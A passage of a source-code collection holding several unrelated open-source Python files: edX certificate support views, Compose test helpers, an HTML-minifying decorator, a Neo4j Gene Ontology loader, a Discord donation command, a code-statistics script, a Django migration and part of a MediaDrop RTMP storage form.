    course_id = urllib.parse.quote_plus(request.GET.get("course_id", ""), safe=':/')
    if course_id:
        try:
            course_key = CourseKey.from_string(course_id)
        except InvalidKeyError:
            return HttpResponseBadRequest(_("Course id '{course_id}' is not valid").format(course_id=course_id))
        else:
            course_overview = get_course_overview_or_none(course_key)
            if not course_overview:
                msg = _("The course does not exist against the given key '{course_key}'").format(course_key=course_key)
                return HttpResponseBadRequest(msg)
        # Restrict to certificates for the requested course
        certificates = [certificate for certificate in certificates
                        if certificate['course_key'] == course_id]
        if not certificates:
            # No certificate yet: the UI shows a 'Generate' button instead
            return JsonResponse([{'username': user.username, 'course_key': course_id, 'regenerate': False}])
    return JsonResponse(certificates)
def _validate_post_params(params):
    """
    Validate request POST parameters to the generate and regenerate certificates end-point.
    Arguments:
        params (QueryDict): Request parameters.
    Returns: tuple of (dict, HttpResponse) — exactly one element is non-None:
        the validated {"user", "course_key"} dict, or a 400 response.
    """
    username = params.get("username")
    # Resolve the user; unknown usernames are a client error, not a server error.
    try:
        user = User.objects.get(username=username)
    except User.DoesNotExist:
        msg = _("User {username} does not exist").format(username=username)
        return None, HttpResponseBadRequest(msg)
    # Parse the course key; malformed keys are likewise a 400.
    raw_course_key = params.get("course_key")
    try:
        course_key = CourseKey.from_string(raw_course_key)
    except InvalidKeyError:
        msg = _("{course_key} is not a valid course key").format(course_key=raw_course_key)
        return None, HttpResponseBadRequest(msg)
    return {"user": user, "course_key": course_key}, None
# Grades can potentially be written - if so, let grading manage the transaction.
@transaction.non_atomic_requests
@require_POST
@require_certificate_permission(GENERATE_ALL_CERTIFICATES)
def regenerate_certificate_for_user(request):
    """
    Regenerate certificates for a user.
    This is meant to be used by support staff through the UI in lms/djangoapps/support
    Arguments:
        request (HttpRequest): The request object
    Returns:
        HttpResponse: 200 on success; 400 for bad params, missing course, or
        non-enrollment; 500 if the certificates API raises.
    Example Usage:
        POST /certificates/regenerate
        * username: "bob"
        * course_key: "edX/DemoX/Demo_Course"
    Response: 200 OK
    """
    # Check the POST parameters, returning a 400 response if they're not valid.
    params, response = _validate_post_params(request.POST)
    if response is not None:
        return response
    user = params["user"]
    course_key = params["course_key"]
    # The course key may parse but still not refer to an existing course.
    course_overview = get_course_overview_or_none(course_key)
    if not course_overview:
        msg = _("The course {course_key} does not exist").format(course_key=course_key)
        return HttpResponseBadRequest(msg)
    # Check that the user is enrolled in the course
    if not CourseEnrollment.is_enrolled(user, course_key):
        msg = _("User {user_id} is not enrolled in the course {course_key}").format(
            user_id=user.id,
            course_key=course_key
        )
        return HttpResponseBadRequest(msg)
    # Attempt to regenerate certificates
    try:
        generate_certificate_task(user, course_key)
    except:  # pylint: disable=bare-except
        # We are pessimistic about the kinds of errors that might get thrown by the
        # certificates API. This may be overkill, but we're logging everything so we can
        # track down unexpected errors.
        log.exception(f"Could not regenerate certificate for user {user.id} in course {course_key}")
        return HttpResponseServerError(_("An unexpected error occurred while regenerating certificates."))
    log.info(
        f"Started regenerating certificates for user {user.id} in course {course_key} from the support page."
    )
    return HttpResponse(200)
@transaction.non_atomic_requests
@require_POST
@require_certificate_permission(GENERATE_ALL_CERTIFICATES)
def generate_certificate_for_user(request):
    """
    Generate certificates for a user.
    This is meant to be used by support staff through the UI in lms/djangoapps/support
    Arguments:
        request (HttpRequest): The request object
    Returns:
        HttpResponse: 200 on success; 400 for bad params, missing course, or
        non-enrollment; 500 if certificate generation raises.
    Example Usage:
        POST /certificates/generate
        * username: "bob"
        * course_key: "edX/DemoX/Demo_Course"
    Response: 200 OK
    """
    # Check the POST parameters, returning a 400 response if they're not valid.
    params, response = _validate_post_params(request.POST)
    if response is not None:
        return response
    user = params["user"]
    course_key = params["course_key"]
    # The course key may parse but still not refer to an existing course.
    course_overview = get_course_overview_or_none(course_key)
    if not course_overview:
        msg = _("The course {course_key} does not exist").format(course_key=course_key)
        return HttpResponseBadRequest(msg)
    # Check that the user is enrolled in the course
    if not CourseEnrollment.is_enrolled(user, course_key):
        msg = _("User {username} is not enrolled in the course {course_key}").format(
            username=user.username,
            course_key=course_key
        )
        return HttpResponseBadRequest(msg)
    # Attempt to generate certificate. Mirror regenerate_certificate_for_user:
    # be pessimistic about errors from the certificates API and log everything,
    # returning a clean 500 instead of an unhandled traceback.
    try:
        generate_certificates_for_students(
            request,
            course_key,
            student_set="specific_student",
            specific_student_id=user.id
        )
    except:  # pylint: disable=bare-except
        log.exception(f"Could not generate certificate for user {user.id} in course {course_key}")
        return HttpResponseServerError(_("An unexpected error occurred while generating certificates."))
    log.info(
        f"Started generating certificates for user {user.id} in course {course_key} from the support page."
    )
    return HttpResponse(200)
|
eduNEXT/edx-platform
|
lms/djangoapps/certificates/views/support.py
|
Python
|
agpl-3.0
| 9,360
|
from __future__ import absolute_import
from __future__ import unicode_literals
from compose.config.config import ConfigDetails
from compose.config.config import ConfigFile
from compose.config.config import load
def build_config(contents, **kwargs):
    """Load a compose config directly from raw file contents."""
    details = build_config_details(contents, **kwargs)
    return load(details)
def build_config_details(contents, working_dir='working_dir', filename='filename.yml'):
    """Wrap raw contents in a ConfigDetails holding a single ConfigFile."""
    config_files = [ConfigFile(filename, contents)]
    return ConfigDetails(working_dir, config_files)
|
andrewgee/compose
|
tests/helpers.py
|
Python
|
apache-2.0
| 495
|
"""
Copyright (c) 2013, Dave Mankoff
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
* Neither the name of Dave Mankoff nor the
names of its contributors may be used to endorse or promote products
derived from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL DAVE MANKOFF BE LIABLE FOR ANY
DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
from .main import Minifier
def htmlmin(*args, **kwargs):
    """Minifies HTML that is returned by a function.
    A simple decorator that minifies the HTML output of any function that it
    decorates. It supports all the same options that :class:`htmlmin.minify` has.
    With no options, it uses ``minify``'s default settings::
        @htmlmin
        def foobar():
           return '   minify me!   '
    or::
        @htmlmin(remove_comments=True)
        def foobar():
           return '   minify me! <!-- and remove me! -->'
    """
    def _decorator(fn):
        # Build the Minifier once per decorated function, not per call.
        minify = Minifier(**kwargs).minify
        def wrapper(*a, **kw):
            return minify(fn(*a, **kw))
        return wrapper
    if len(args) == 1:
        # Bare usage (@htmlmin): the single positional arg is the function.
        if callable(args[0]) and not kwargs:
            return _decorator(args[0])
        else:
            # BUG FIX: message previously read "does accept positional
            # arguments", inverting its meaning.
            raise RuntimeError(
                'htmlmin decorator does not accept positional arguments')
    elif len(args) > 1:
        raise RuntimeError(
            'htmlmin decorator does not accept positional arguments')
    else:
        # Parameterized usage (@htmlmin(...)): return the real decorator.
        return _decorator
|
mankyd/htmlmin
|
htmlmin/decorator.py
|
Python
|
bsd-3-clause
| 2,502
|
from __future__ import print_function
from neo4j.v1 import GraphDatabase, basic_auth
import os, sys
import json
import pickle
import ipdb
from tqdm import tqdm
from infer_effects_go import Graph, GOgraph
# Cypher statement that wipes the whole database before a fresh load.
clear_string = '''
MATCH (n)
DETACH DELETE n
'''[1:-1]
# DOMAIN MODEL
# (:Annotation {go_id})-[:
# Pre-pickled GO graph produced by infer_effects_go (see import above).
with open('go_graph.pkl', 'rb') as fp:
    go_graph = pickle.load(fp)
# with open('go_graph_neo4j_input.csv', 'w') as fp:
#     print('child,relation,parent', file=fp)
#     for child, parents in tqdm(go_graph._rel_table.iteritems()):
#         for k, v in parents.iteritems():
#             print('{0},{1},{2}'.format(child, v, k), file=fp)
class GoGraphDatabase(object):
    """Thin wrapper around the neo4j bolt driver for loading a GO term graph."""
    def __init__(self, clear=False):
        # NOTE(review): credentials are hard-coded; move to config/env vars.
        self._driver = GraphDatabase.driver("bolt://127.0.0.1:7687/",
                                            auth=basic_auth("neo4j", "fffan77"))
        if clear:
            # Wipe the database (clear_string is the module-level DETACH DELETE).
            with self._driver.session() as session:
                session.run(clear_string)
    def add_term(self, go_id):
        """Create a :GoTerm node for go_id inside a write transaction."""
        with self._driver.session() as session:
            session.write_transaction(self.create_go_term_node, go_id)
    def add_rel_dep(self, go_id_1, go_id_2, rel_desc = 'IS_A'):
        """Create an edge between two existing terms; returns False (no-op) on falsy ids."""
        if (not go_id_1) or (not go_id_2):
            return False
        with self._driver.session() as session:
            session.write_transaction(self.create_go_edge, goid1=go_id_1, goid2=go_id_2, rel_desc=rel_desc)
    def add_rel(self, go_id_1, go_id_2, rel_desc = 'is_a'):
        """Create a (g1)-[:rel_desc]->(g2) edge via auto-commit session.run."""
        # Relationship types cannot be bound as Cypher parameters, hence the
        # string interpolation; rel_desc comes from the trusted pickled graph.
        querystr = ("MATCH (g1:GoTerm {go_id: $go_id_1 }), (g2:GoTerm {go_id: $go_id_2 }) "
                    "CREATE (g1)-[:%s]->(g2)") % rel_desc
        with self._driver.session() as session:
            session.run(querystr,
                        go_id_1=go_id_1,
                        go_id_2=go_id_2)
    @staticmethod
    def create_go_term_node(tx, go_id):
        tx.run("CREATE (a:GoTerm {go_id: $go_id})", go_id=go_id)
    @staticmethod
    def create_go_edge(tx, goid1, goid2, rel_desc):
        # BUG FIX: the original never bound $goid1/$goid2 (so the MATCH could
        # not find any nodes) and ignored rel_desc, hard-coding IS_A.
        tx.run(("MATCH (g1:GoTerm {go_id: $goid1 }), (g2:GoTerm {go_id: $goid2 }) "
                "CREATE (g1)-[:%s]->(g2)") % rel_desc,
               goid1=goid1, goid2=goid2)
# Rebuild the graph database from scratch: nodes first, then typed edges.
g = GoGraphDatabase(clear = True)
# first, create nodes
# NOTE(review): iterkeys()/iteritems() below are Python 2 only — this script
# appears to predate Python 3 and would need .keys()/.items() there.
for k in go_graph._graph.iterkeys():
    g.add_term(k)
# # now, create edges
# for k, v in go_graph._graph.iteritems():
#     for x in v:
#         print(k, x)
#         if x and k:
#             g.add_rel(go_id_1=k, go_id_2=x)
# create edges with appropriate relationship info
for k, v in go_graph._rel_table.iteritems():
    for x, y in v.iteritems():
        print(k, y, x)
        g.add_rel(go_id_1=k, go_id_2=x, rel_desc=y)
|
JDRomano2/VenomKB
|
venomkb/archive/scripts/build_neo4j_go_database.py
|
Python
|
gpl-2.0
| 2,593
|
import discord
async def donate(cmd, message, args):
    """Reply with Sigma's donation info embed; pass 'mini' as the first arg for the short form."""
    mini = bool(args) and args[0] == 'mini'
    sigma_image = 'https://i.imgur.com/mGyqMe1.png'
    sigma_title = 'Sigma Donation Information'
    patreon_url = 'https://www.patreon.com/ApexSigma'
    paypal_url = 'https://www.paypal.me/AleksaRadovic'
    support_url = 'https://discordapp.com/invite/aEUCHwX'
    if mini:
        # Compact embed: title plus a one-line Patreon pitch.
        response = discord.Embed(color=0x1B6F5F, title=sigma_title)
        response.description = f'Care to help out? Come support Sigma on [Patreon]({patreon_url})!'
    else:
        # Full embed: author header plus the long pitch in a named field.
        donation_text = (
            'If you could spare some money, it would be amazing of you to support my work. '
            'At the moment support from Sigma\'s users is my only source of income. '
            f'Come check out my [Patreon]({patreon_url}) and lend a hand! You also get some goodies! '
            f'Or if a subscription is too much commitment for you, how about [PayPal]({paypal_url})? '
            f'If you do end up being one of the lovely people to give support, '
            f'drop by our [Server]({support_url}) so we can properly thank you.'
            f'\n**Thank you to the {len(cmd.bot.info.donors.donors)} donors who have provided support!**'
        )
        response = discord.Embed(color=0x1B6F5F)
        response.set_author(name=sigma_title, icon_url=sigma_image, url=cmd.bot.cfg.pref.website)
        response.add_field(name='Care to help out?', value=donation_text)
    await message.channel.send(embed=response)
|
AXAz0r/apex-sigma-core
|
sigma/modules/help/donate.py
|
Python
|
gpl-3.0
| 1,698
|
#!/usr/bin/env python
#
# $Id: get_code_stats.py 9318 2011-06-10 02:37:10Z nathan_george $
#
# Proprietary and confidential.
# Copyright $Date:: 2011#$ Perfect Search Corporation.
# All rights reserved.
#
import sys
import os
import re
import optparse
import math
buildscriptDir = os.path.dirname(__file__)
buildscriptDir = os.path.abspath(os.path.join(buildscriptDir, os.path.pardir))
sys.path.append(buildscriptDir)
import sandbox
import codescan
import xmail
import metadata
from ioutil import *
EXT_PAT = metadata.INTERESTING_EXT_PAT
FROM = 'Code Stat Scanner <code.scan@example.com>'
parser = optparse.OptionParser('Usage: %prog [options] [folder]\n\nCompiles stats about a code base; optionally emails report.')
xmail.addMailOptions(parser)
def getRelevantPaths(p):
    """Return p (if it is a file path) plus every ancestor folder prefix.

    Folder prefixes keep their trailing '/'; the list always ends with ''
    (the tree root). E.g. 'a/b/c.py' -> ['a/b/c.py', 'a/b/', 'a/', ''].
    """
    paths = []
    if not p.endswith('/'):
        paths.append(p)
    remaining = p
    while remaining:
        slash = remaining.rfind('/')
        if slash == -1:
            paths.append('')
            break
        remaining = remaining[:slash + 1]
        paths.append(remaining)
        remaining = remaining[:-1]
    return paths
def getValuesKeyName(key):
    """Return the bracketed companion key that stores the raw values list."""
    return ''.join(['[', key, ']'])
def isValuesKeyName(key):
    """True if key names a raw-values list (bracketed), e.g. '[line count]'.

    Robustness fix: startswith() handles the empty string, where the old
    key[0] indexing raised IndexError.
    """
    return key.startswith('[')
class StatsHolder:
    """Accumulates stats for a scanned tree, keyed by relative path and by file extension."""
    def __init__(self, rootPath):
        rootPath = norm_folder(rootPath)
        self.rootPath = rootPath
        # statName -> total, plus '[statName]' -> list of raw per-file values,
        # keyed by path relative to rootPath ('' means the whole tree).
        self.statsByPath = {}
        # Same inner shape, keyed by file extension ('.cpp', '.py', ...).
        self.statsByExtension = {}
    def getSandboxName(self):
        # Extract '<name>' from a '/sandboxes/<name>/.../code...' root path;
        # falls back to the raw root path if the layout doesn't match.
        i = self.rootPath.find('/sandboxes/')
        if i != -1:
            x = self.rootPath[i + 11:]
            i = x.find('/code')
            if i > -1:
                x = x[0:i]
            i = x.rfind('/')
            if i > -1:
                x = x[0:i]
            return x
        else:
            return self.rootPath
    def getRelativePath(self, path):
        endsWithSlash = path.endswith('/')
        path = os.path.abspath(path).replace('\\', '/')
        # abspath() removes trailing slash; undo
        if endsWithSlash and path[-1] != '/':
            path = path + '/'
        return path[len(self.rootPath):]
    def addStat(self, path, statName, number):
        # File paths (no trailing '/') also aggregate into per-extension
        # totals plus a raw-values list; folder paths only roll up totals.
        shouldAggregate = not path.endswith('/')
        if shouldAggregate:
            k = getValuesKeyName(statName)
            dict = self.statsByExtension
            ignored, ext = os.path.splitext(path)
            #print('ext = %s' % ext)
            #sys.exit(0)
            if not ext in dict:
                dict[ext] = {}
            dict = dict[ext]
            if not statName in dict:
                dict[statName] = number
                dict[k] = [number]
            else:
                dict[statName] = dict[statName] + number
                dict[k].append(number)
        relativePath = self.getRelativePath(path)
        sbp = self.statsByPath
        # Roll the stat up into every ancestor folder, all the way to ''.
        for p in getRelevantPaths(relativePath):
            if not p in sbp:
                sbp[p] = {}
            dict = sbp[p]
            if not statName in dict:
                dict[statName] = number
                if shouldAggregate:
                    #print('aggregating %s for %s', (k, p))
                    dict[k] = [number]
            else:
                dict[statName] = dict[statName] + number
                if shouldAggregate:
                    dict[k].append(number)
_CPP_TESTNAME_PAT = re.compile(r'^\s*(SIMPLE_TEST\s*\(\s*(.*?)\s*\)|class\s+([a-zA-Z_0-9]+)\s*:\s*(public|protected|private)\s+[a-zA-Z_0-9]+Test)', re.MULTILINE | re.DOTALL)
_JAVA_TESTNAME_PAT = re.compile(r'^\s*public\s+void\s+([a-zA-Z_0-9]+)\s*\(', re.MULTILINE | re.DOTALL)
_PY_TESTNAME_PAT = re.compile(r'^\s*def test([a-zA-Z_0-9]+)\s*\(\s*self\s*\)\s*:', re.MULTILINE | re.DOTALL)
_CPP_CLASS_PAT = re.compile(r'^\s*(template\s*<.*?>\s*)?(class|struct|union)\s+([a-zA-Z_0-9]+)', re.MULTILINE | re.DOTALL)
_JAVA_CLASS_PAT = re.compile(r'^\s*((abstract|public|private|protected|static|final)\s+)*(class|interface)\s+([a-zA-Z_0-9]+)', re.MULTILINE | re.DOTALL)
_PY_CLASS_PAT = re.compile(r'^\s*class\s+([a-zA-Z_0-9]+).*?:', re.MULTILINE | re.DOTALL)
_TEST_FILE_PAT = re.compile(r'/test/', re.IGNORECASE)
_CLASS_PATS = [_CPP_CLASS_PAT, _JAVA_CLASS_PAT, _PY_CLASS_PAT]
_TESTNAME_PATS = [_CPP_TESTNAME_PAT, _JAVA_TESTNAME_PAT, _PY_TESTNAME_PAT]
def getFileTypeIndex(path):
    """Map a file path to its language index: 0=C++, 1=Java, 2=Python, -1=other."""
    lowered = path.lower()
    for index, suffixes in enumerate((('.cpp', '.h'), ('.java',), ('.py',))):
        if lowered.endswith(suffixes):
            return index
    return -1
def getClassPatForPath(path):
    """Return the class-declaration regex for path's language, or None if unknown."""
    index = getFileTypeIndex(path)
    return _CLASS_PATS[index] if index != -1 else None
def getTestnamePatForPath(path):
    """Return the unit-test-name regex for path's language, or None if unknown."""
    index = getFileTypeIndex(path)
    return _TESTNAME_PATS[index] if index != -1 else None
def analyzeFile(fpath, stats):
    """Record byte/line counts — and class or unit-test counts where the
    language is recognized — for one file into stats."""
    fpath = os.path.abspath(fpath)
    rel = stats.getRelativePath(fpath)
    #print('analyzing %s' % rel)
    txt = read_file(fpath)
    byteCount = len(txt)
    stats.addStat(fpath, 'byte count, impl + test', byteCount)
    lineCount = codescan.getLineNumForOffset(txt, byteCount)
    stats.addStat(fpath, 'line count, impl + test', lineCount)
    # Anything under a /test/ folder counts as test code, everything else as impl.
    isTest = bool(_TEST_FILE_PAT.search(fpath))
    codeType = 'impl'
    if isTest:
        codeType = 'test'
    stats.addStat(fpath, 'byte count, ' + codeType, byteCount)
    stats.addStat(fpath, 'line count, ' + codeType, lineCount)
    # See if we know how to do any further analysis on this file.
    pat = getClassPatForPath(fpath)
    if pat:
        if isTest:
            pat = getTestnamePatForPath(fpath)
            if pat:
                stats.addStat(fpath, 'unit test count', len(pat.findall(txt)))
        else:
            stats.addStat(fpath, 'class count', len(pat.findall(txt)))
def statPathIsFile(p):
    """True if the stat path names a source file we analyze (by extension)."""
    dot = p.rfind('.')
    return dot > -1 and p[dot + 1:] in ('cpp', 'h', 'java', 'py')
def statPathIsComponent(p):
    """True for the root ('') or a single top-level folder like 'name/'."""
    return p == '' or (p.count('/') == 1 and p.endswith('/'))
# Kept for any external users of the old sentinel name; type(0.1) is float.
_FLOAT_TYPE = float
def getReportLine(key, number, showKB = False, formatSpecifier='%0.2f'):
    """Format one 'key = value' report line.

    Floats are rendered with formatSpecifier (default two decimals); a
    trailing '.00' is stripped so whole floats print as integers. When
    showKB is true, number is also shown as kilobytes.
    """
    # BUG FIX: the default was '%02f' (i.e. six decimals), which produced
    # strings like '1.000000' and defeated the 3-char '.00' strip below;
    # '%0.2f' matches the two-decimal forms every explicit caller passes.
    if isinstance(number, float):
        numtxt = formatSpecifier % number
        if numtxt.endswith('00'):
            # Drop the trailing '.00' so e.g. 2.00 prints as '2'.
            numtxt = numtxt[0:-3]
    else:
        numtxt = str(number)
    line = '%s = %s' % (key, numtxt)
    if showKB:
        line += ' (%0.0f KB)' % (number / 1024.0)
    return line
def getAggregateStats(dict, key):
    """Return (mean, population stddev) of the raw values recorded under key."""
    samples = dict.get(getValuesKeyName(key))
    return mean(samples), stddev(samples)
def describeTestRatio(ratio, multiplier = 1.0):
    """Render a test/impl ratio with a coverage label; multiplier scales the thresholds."""
    for threshold, label in ((0.085, 'POOR COVERAGE'),
                             (0.20, 'fair coverage'),
                             (0.5, 'good coverage')):
        if ratio < threshold * multiplier:
            break
    else:
        label = 'excellent coverage'
    return '%0.2f (%s)' % (ratio, label)
def generateReport(stats):
    """Render the accumulated StatsHolder contents as a plain-text report,
    one section per top-level component, flagging unusually complex files."""
    #print(stats.statsByPath)
    report = ''
    components = [p for p in stats.statsByPath.keys() if statPathIsComponent(p)]
    files = [p for p in stats.statsByPath.keys() if statPathIsFile(p)]
    components.sort()
    files.sort()
    uberDict = stats.statsByPath['']
    # Complexity thresholds: mean + 2.5 sigma, computed tree-wide and per extension.
    avg, stdev = getAggregateStats(uberDict, 'byte count, impl')
    tooBigs = {'': max(avg + 2.5 * stdev, 20000)}
    avg, stdev = getAggregateStats(uberDict, 'line count, impl')
    tooLongs = {'': max(avg + 2.5 * stdev, 1000)}
    for ext in stats.statsByExtension.keys():
        dict = stats.statsByExtension[ext]
        avg, stdev = getAggregateStats(dict, 'byte count, impl')
        tooBigs[ext] = avg + 2.5 * stdev
        avg, stdev = getAggregateStats(dict, 'line count, impl')
        tooLongs[ext] = max(avg + 2.5 * stdev, 1000)
    for path in components:
        desc = path
        if desc == '':
            desc = 'entire folder tree'
        report += '\nStats for %s' % desc
        dict = stats.statsByPath[path]
        # Skip the bracketed raw-values companions; report only the totals.
        keys = [k for k in dict.keys() if not isValuesKeyName(k)]
        keys.sort()
        for key in keys:
            showKB = key.startswith('byte')
            report += '\n ' + getReportLine(key, dict[key], showKB)
            if showKB or key.startswith('line'):
                values = dict[getValuesKeyName(key)]
                avg = mean(values)
                report += '; ' + getReportLine('mean', avg, showKB, formatSpecifier='%0.0f')
                report += '; ' + getReportLine('std dev', stddev(values), False, formatSpecifier='%0.1f')
        classCount = dict.get('class count', 0)
        unitTestCount = dict.get('unit test count', 0)
        # Coverage ratios: test/impl lines, test/impl bytes, tests per class.
        if unitTestCount:
            implLineCount = dict.get('line count, impl', 0)
            testLineCount = dict.get('line count, test', 0)
            if implLineCount:
                ratio = describeTestRatio(testLineCount / float(implLineCount))
                report += '\n ' + getReportLine('test lines per impl line', ratio)
            implByteCount = dict.get('byte count, impl', 0)
            testByteCount = dict.get('byte count, test', 0)
            if implByteCount:
                ratio = describeTestRatio(testByteCount / float(implByteCount))
                report += '\n ' + getReportLine('test bytes per impl byte', ratio)
            if classCount:
                ratio = describeTestRatio(float(unitTestCount) / classCount, 2.5)
            else:
                ratio = '(undefined; no classes)'
        else:
            ratio = 'NO UNIT TESTS!'
        report += '\n ' + getReportLine('tests per class', ratio)
        if path:
            myFiles = [f for f in files if f.startswith(path)]
            #testFiles = [f for f in myFiles if _TEST_FILE_PAT.search(f)]
            #implFiles = [f for f in myFiles if not _TEST_FILE_PAT.search(f)]
            tooComplex = []
            for implF in myFiles:
                ignored, ext = os.path.splitext(implF)
                size = stats.statsByPath[implF].get('byte count, impl')
                length = stats.statsByPath[implF].get('line count, impl')
                if size > tooBigs[''] or size > tooBigs[ext] or length > tooLongs[''] or length > tooLongs[ext]:
                    tooComplex.append((implF, size, length))
            if tooComplex:
                # Java doesn't support partial classes, so splitting classes into multiple
                # files isn't always practical. In C++ and python, however, there are good
                # ways to split into smaller files.
                if tooComplex[0][0].endswith('.java'):
                    comment = 'refactor suggested'
                else:
                    comment = 'REFACTOR NEEDED'
                report += '\n unusually complex files (%s):' % comment
                for tc in tooComplex:
                    report += '\n %s (%0.0f KB, %d lines)' % (tc[0], tc[1] / 1024.0, tc[2])
        report += '\n'
    return report
def sum(numbers):
    """Total of numbers. NOTE: intentionally shadows the builtin sum();
    kept under this name because mean()/variance() call it."""
    total = 0
    for value in numbers:
        total += value
    return total
def mean(numbers):
    """Arithmetic mean as a float; raises ZeroDivisionError on an empty sequence."""
    return float(sum(numbers)) / len(numbers)
def variance(numbers):
    """Population variance: mean of squared deviations from the mean."""
    avg = mean(numbers)
    return sum((value - avg) ** 2 for value in numbers) / len(numbers)
def stddev(numbers):
    """Population standard deviation (we assume all values are present,
    not a representative sample)."""
    return variance(numbers) ** 0.5
class StatsRecurser:
    """metadata.visit() recursion callback: counts subdirs, prunes nothing."""
    def __init__(self, stats):
        self.stats = stats
    def select(self, folder, dirs):
        """Record folder's subdir count, then recurse into every subdir."""
        self.stats.addStat(folder, "scanned subdir count", len(dirs))
        return dirs
class StatsVisitor:
    """metadata.visit() file callback: analyzes each file and counts scanned files."""
    def __init__(self, stats):
        self.stats = stats
    def visit(self, folder, item, relativePath):
        # folder is concatenated directly with item, so it is expected to end
        # with a path separator — TODO confirm against metadata.visit().
        analyzeFile(folder + item, self.stats)
        self.stats.addStat(folder, "scanned file count", 1)
def analyze(path, prebuilt, options):
    """Compile code stats for the tree at path, print the report, and
    optionally email it.

    Arguments:
        path: folder to scan; must exist.
        prebuilt: currently unused; kept for caller compatibility.
        options: parsed optparse options (mail destination etc.).
    Returns 1 (error) if path is not a folder; otherwise None (exit code 0).
    """
    if not os.path.isdir(path):
        sys.stderr.write('%s is not a valid folder.\n' % path)
        return 1
    path = norm_folder(path)
    stats = StatsHolder(path)
    print('\nCompiling stats for %s...' % metadata.get_friendly_name_for_path(path))
    visitor = StatsVisitor(stats)
    recurser = StatsRecurser(stats)
    visitedFiles, visitedFolders = metadata.visit(path, visitor, recurser, excludePrograms=True)#, debug=True)
    report = generateReport(stats)
    print(report)
    if xmail.hasDest(options):
        # Consistency fix: reuse the module-level FROM constant instead of
        # repeating the identical sender literal inline.
        xmail.sendmail(report, subject='code stats for %s' % metadata.get_friendly_name_for_path(path),
                       sender=FROM, options=options)
if __name__ == '__main__':
    # A single optional positional arg overrides the sandbox code root.
    options, args = parser.parse_args()
    prebuilt = []
    if args:
        folder = args[0]
    else:
        folder = sandbox.current.get_code_root()
    # analyze() returns 1 on bad input, None on success (exit code 0).
    exitCode = analyze(folder, prebuilt, options)
    sys.exit(exitCode)
|
perfectsearch/sandman
|
code/buildscripts/codescan/get_code_stats.py
|
Python
|
mit
| 12,831
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
from django.conf import settings
class Migration(migrations.Migration):
    """Creates the BetaToken table used for beta-invite redemption."""
    dependencies = [
        ('reformedacademy', '0006_auto_20140915_0251'),
    ]
    operations = [
        migrations.CreateModel(
            name='BetaToken',
            fields=[
                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
                # Short (5-char) invite code.
                ('token', models.CharField(max_length=5)),
                # NOTE(review): blank=True without null=True on a DateTimeField
                # means an unset value cannot be stored as NULL — confirm intent
                # in a follow-up migration rather than editing this historical one.
                ('redeemed', models.DateTimeField(blank=True)),
                # The b'' related_name prefixes are a Python 2 artifact.
                ('invited_by', models.ForeignKey(related_name=b'invited_token', blank=True, to=settings.AUTH_USER_MODEL, null=True)),
                ('redeemed_by', models.ForeignKey(related_name=b'redeemed_token', blank=True, to=settings.AUTH_USER_MODEL, null=True)),
            ],
            options={
            },
            bases=(models.Model,),
        ),
    ]
|
reformedforum/reformedacademy
|
reformedacademy/migrations/0007_betatoken.py
|
Python
|
gpl-3.0
| 979
|
# This file is a part of MediaDrop (http://www.mediadrop.net),
# Copyright 2009-2014 MediaDrop contributors
# For the exact contribution history, see the git revision log.
# The source code contained in this file is licensed under the GPLv3 or
# (at your option) any later version.
# See LICENSE.txt in the main project directory, for more information.
from formencode import Invalid
from formencode.validators import FancyValidator
from tw.api import JSSource
from tw.forms import FormFieldRepeater
from mediadrop.forms import ListFieldSet, TextField
from mediadrop.forms.admin.storage import StorageForm
from mediadrop.lib.i18n import N_, _
from mediadrop.plugin import events
# Sure this could be abstracted into something more reusable.
# But at this point there's no need. Refactor later if needed.
class TranslateableRTMPServerJSSource(JSSource):
    """JSSource whose rendered output localizes the 'Add another URL' label at render time."""
    def render(self, *args, **kwargs):
        rendered = JSSource.render(self, *args, **kwargs)
        return rendered % {'add_url': _('Add another URL')}
rtmp_server_js = TranslateableRTMPServerJSSource("""
window.addEvent('domready', function(){
var fields = $('rtmp').getElement('li');
var addButton = new Element('span', {
'class': 'add-another clickable',
'text': '%(add_url)s'
});
addButton.inject(fields, 'bottom').addEvent('click', function(){
var lastInput = addButton.getPrevious();
var fullname = lastInput.get('name');
var sepindex = fullname.indexOf('-') + 1;
var name = fullname.substr(0, sepindex);
var nextNum = fullname.substr(sepindex).toInt() + 1;
var el = new Element('input', {
'type': 'text',
'name': name + nextNum,
'class': 'textfield repeatedtextfield rtmp-server-uri'
});
el.inject(lastInput, 'after').focus();
});
});
""", location='headbottom')
class RTMPURLValidator(FancyValidator):
    """Accept only rtmp:// URLs, normalizing away any trailing slashes."""
    def _to_python(self, value, state=None):
        if not value.startswith('rtmp://'):
            raise Invalid(_('RTMP server URLs must begin with rtmp://'),
                          value, state)
        return value.rstrip('/')
class RemoteURLStorageForm(StorageForm):
    """Admin form for the remote-URL storage engine: a repeatable list of RTMP server URLs."""
    event = events.Admin.Storage.RemoteURLStorageForm
    fields = StorageForm.fields + [
        ListFieldSet('rtmp',
            legend=N_('RTMP Servers:'),
            suppress_label=True,
            children=[
                # FIXME: Display errors from the RTMPURLValidator
                FormFieldRepeater('known_servers',
                    widget=TextField(
                        css_classes=['textfield rtmp-server-uri'],
                        validator=RTMPURLValidator(),
                    ),
                    suppress_label=True,
                    repetitions=1,
                ),
